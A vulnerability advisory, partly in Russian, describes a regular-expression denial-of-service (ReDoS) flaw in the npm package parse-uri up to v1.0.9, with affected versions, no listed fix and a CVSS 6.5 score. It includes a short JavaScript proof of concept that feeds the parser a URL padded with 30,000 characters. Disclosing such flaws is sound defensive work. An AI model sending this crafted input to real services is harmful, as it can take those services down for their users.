Описание
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
PoC
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();
Пакеты
Наименование
parse-uri
npm
Затронутые версииВерсия исправления
<= 1.0.9
Отсутствует
Наименование
parseuri
npm
Затронутые версииВерсия исправления
Отсутствует
Связанные уязвимости
CVSS3: 6.5
nvd
около 1 года назад
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.